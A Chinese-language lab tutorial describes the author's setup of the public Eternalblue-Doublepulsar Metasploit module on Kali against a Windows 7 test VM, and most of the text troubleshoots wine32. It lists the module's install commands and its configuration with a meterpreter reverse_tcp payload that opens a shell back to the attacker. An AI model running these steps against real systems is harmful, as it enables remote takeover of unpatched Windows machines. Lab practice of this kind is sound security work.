使用这个模块本来是用来做攻击测试的,但是我始终没有测试成功,我大概花了1天半的时间,一直在研究为什么网上的文章里都显示测试成功了,我的就没有成功,一直在找原因,因为除了时间上的差异,kali模块增多,高版本的wine32软件,我真的不知道到底问题出在哪里了,就真的只好从这些方面入手去排查,从问题出发找原因,这个真的需要耐心,毅力。
我写的详细些,大家也就看的明白,这样就能保证你一次成功的概率比较高,在网上搜的一些文章,别人只是把成功的截图贴出来了,但是他失败了后又做了什么操作,安装了什么软件等等,你都不知道,反正最后就是看到他成功了,我这里会列出我所遇到的错误,以及解决方法,如果你也遇到了同样的问题,可以采用我的方法去尝试解决,不能保证100%解决,但是有些错误你确实在Google上也搜不到答案,不然你也不会看到我这篇文章了。
Kali环境:Kali_amd64位,1817个exp,官网下载的VMware虚拟机Kali环境,IP:192.168.137.152
Windos环境:Windows 7 旗舰版 x86,IP:192.168.137.123
首先,在使用Eternalblue_doublepulsar这个模块的时候,一定需要你安装wine32,这个wine32是在linux环境下模拟windows环境,可以安装windows平台的软件,软件很厉害,但是Bug真的很多,你在网上搜下,有N多人在Github上提交这个软件的Bug,我一度认为我所遇到的问题中就是一个Bug。如何安装呢?
1、更新kali
apt-get update2、安装wine 32
dpkg --add-architecture i386 && apt-get update && apt-get install wine323、开始下载Eternalblue_doublepulsar攻击模块
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit4、将模块复制到msf目录下
#切换到该目录下
cd Eternalblue-Doublepulsar-Metasploit
#拷贝文件到smb目录下
cp -r deps/ eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb5、运行postgresql 数据库
service postgresql start6、启动msf并搜索已下载的模块
#开启MSF渗透框架
msfconsole
#搜索指定模块
search eternalblue7、配置模块参数选项(说明:经Github项目中介绍,如果explorer.exe测试失败,可以改用processinject参数为lsass.exe等)
use exploit/windows/smb/eternalblue_doublepulsar
set PROCESSINJECT explorer.exe
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.137.152
set RHOST 192.168.137.1238、运行漏洞模块
run如果按照以上8个步骤操作完以后,没有报错,你看到的是反弹回来的shell,恭喜你,一次性成功。
以下说的是会遇到的问题。
问题1:
解决1:这个因为没有/root/.wine目录,执行以下命令即可创建该目录。
wine cmd.exe
问题2:创建目录的过程中又出现了不能加载wine-gecko这个错误
解决2:因为wine在使用过程中会出现图形化界面,这就需要这个基于Mozilla的Gecko渲染引擎来呈现,手动安装所需版本的wine-gecko即可。我们首先下载Wine提供的MSI二进制文件,请注意下载32位版本的,因为我们安装的是wine32。
wget https://dl.winehq.org/wine/wine-gecko/2.44/wine_gecko-2.44-x86.msi安装wine-gecko
wine msiexec /i wine_gecko-2.44-x86.msi问题3:如图所示
解决3:这个是由于环境变量导致的,我们需要重新设置环境变量,默认的是64位,修改为32位的。执行以下命令设置环境变量
env WINEPREFIX=$HOME/.wine32 WINEARCH=win32 winecfg之后将/root/.wine目录删除,重新生成.wine32目录,将.wine32目录重命名为.wine
rm -rf .wine
wine cmd.exe
mv .wine32 .wine问题4:这个问题是最要命的,如图
解决4:因为在写文章的时候,这个问题已经没有出现了,我之前一直是因为红框的问题,不能解决,Google、Github等都搜不到解决办法,我这次安装时安装了wine-gecko库以后就没有出现这个错误了,所以如果出现这个错误,请参考解决2。
问题5:如图
解决5:这个的话,我的建议是多试几次,但是每次的IP要换一下,因为在分析一个程序,就导致到把快照恢复到之前某个状态,唯一的变化是IP地址改变了,然后我就又试了一次,发现成功了,所以也建议大家多尝试几次。最后放上我成功的截图啦。
参考链接:
https://www.guyrutenberg.com/2016/06/12/fixing-html-rendering-in-wine-on-debian-jessie/